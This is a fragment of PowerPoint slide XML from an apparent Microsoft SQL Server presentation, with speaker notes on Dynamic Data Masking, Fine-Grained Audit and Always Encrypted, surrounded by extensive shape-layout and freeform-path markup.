                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Dynamic Data Masking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allows you to easily mask fields (such as account numbers) so that only part of the data can be seen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[click] </a:t>
            </a:r>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The last layer is about monitoring who accesses the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL Server’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fine-Grained Audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>feature allows you to enforce a data audit policy and track which users are doing which actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[click] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>So that’s where we’re going with security for SQL Server on Linux. Almost all of these features are already available for you to try in the CTP1 preview release, please try them out and share your feedback with us. Support for TLS is in progress and will become available in an upcoming build. Similarly, Active Directory Authentication is one of our most requested features and will become available in an upcoming build. </a:t>
            </a:r>
          </a:p>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Connect 2016</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8/20/19 8:47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47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 https://docs.microsoft.com/en-us/sql/relational-databases/security/encryption/always-encrypted-database-engine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3D2AD-3896-4D5C-87D1-EE86FD4147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1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[this slide has animation]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A SQL Server database contains a table (dbo.Patients) that contains sensitive information, like SSN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>[click]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When Always Encrypted is enabled on the SSN column, the values are encrypted with a column encryption key. The encrypted value (the ciphertext) is stored in the database, and can no longer be read directly from the database without access to the column master key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>An enhanced database driver library (with Always Encrypted support) is used by client applications to access the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>[click]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0"/>
              <a:t>A client application executes a query to return a row from dbo.Patients by SSN. The query is routed through the enhanced database driver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>[click]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0"/>
              <a:t>The database driver uses the column master key to encrypt the search term, and the matching row is returned by the database engine. Encryption of the search term is transparent to the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>[click]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0"/>
              <a:t>The matching row is returned to the application; the database driver decrypts the Always Encrypted column value. Decryption is transparent to the application.</a:t>
            </a:r>
          </a:p>
          <a:p>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0A7F1-1D53-4645-8AB9-46355AEB7888}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315233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3D2AD-3896-4D5C-87D1-EE86FD4147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94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3D2AD-3896-4D5C-87D1-EE86FD4147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741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7.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/></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7.bin"/><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7.bin"/><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Commercial Sales Solution Tours">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43" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA9E55C-7145-44AA-A194-18A56141D1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440637" y="683776"/>
            <a:ext cx="4783277" cy="1421928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4800" b="1" spc="-98">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Partner Practice Enablement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" spc="-98">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F557F69-8913-447D-9AE6-ED17933C30E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6259750" y="2587752"/>
            <a:ext cx="5932250" cy="3439777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1132473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924251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9246306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54570532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06432675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1060666357"/>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3283143012"/>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3149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21926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6368123"/>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748911019"/>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945432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9907656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Content Slide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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263524" y="1420824"/>
            <a:ext cx="11660789" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C0000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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>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9" name="TextBox 18"/>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2612413999"/>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63949" y="289511"/>
            <a:ext cx="11655078" cy="1051560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lorem ipsum dolor sit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>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3" name="TextBox 12"/>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156674692"/>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917">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="523">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="293">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53523" cy="2162131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="392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285997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Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090210" y="126993"/>
            <a:ext cx="9043734" cy="6634630"/>
            <a:chOff x="1951" y="0"/>
            <a:chExt cx="5890" cy="4321"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 218"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="2190"/>
              <a:ext cx="5871" cy="2131"/>
              <a:chOff x="1951" y="2190"/>
              <a:chExt cx="5871" cy="2131"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1561" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="219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25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140"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26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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28"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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29"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="382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30"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070"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Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="560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Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="2202"/>
                <a:ext cx="188" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 86 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 86 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 136 h 220"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 136 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 136 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 136 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 86 h 220"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 86 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 86 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 86 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 136 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 136 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>
                  <a:gd name="T67" fmla="*/ 8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20">
                    <a:moveTo>
                      <a:pt x="188" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159"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Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="2198"/>
                <a:ext cx="154"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Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701"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Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045"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Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="219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Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392"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2" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589"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Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739"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Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="2190"/>
                <a:ext cx="219" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
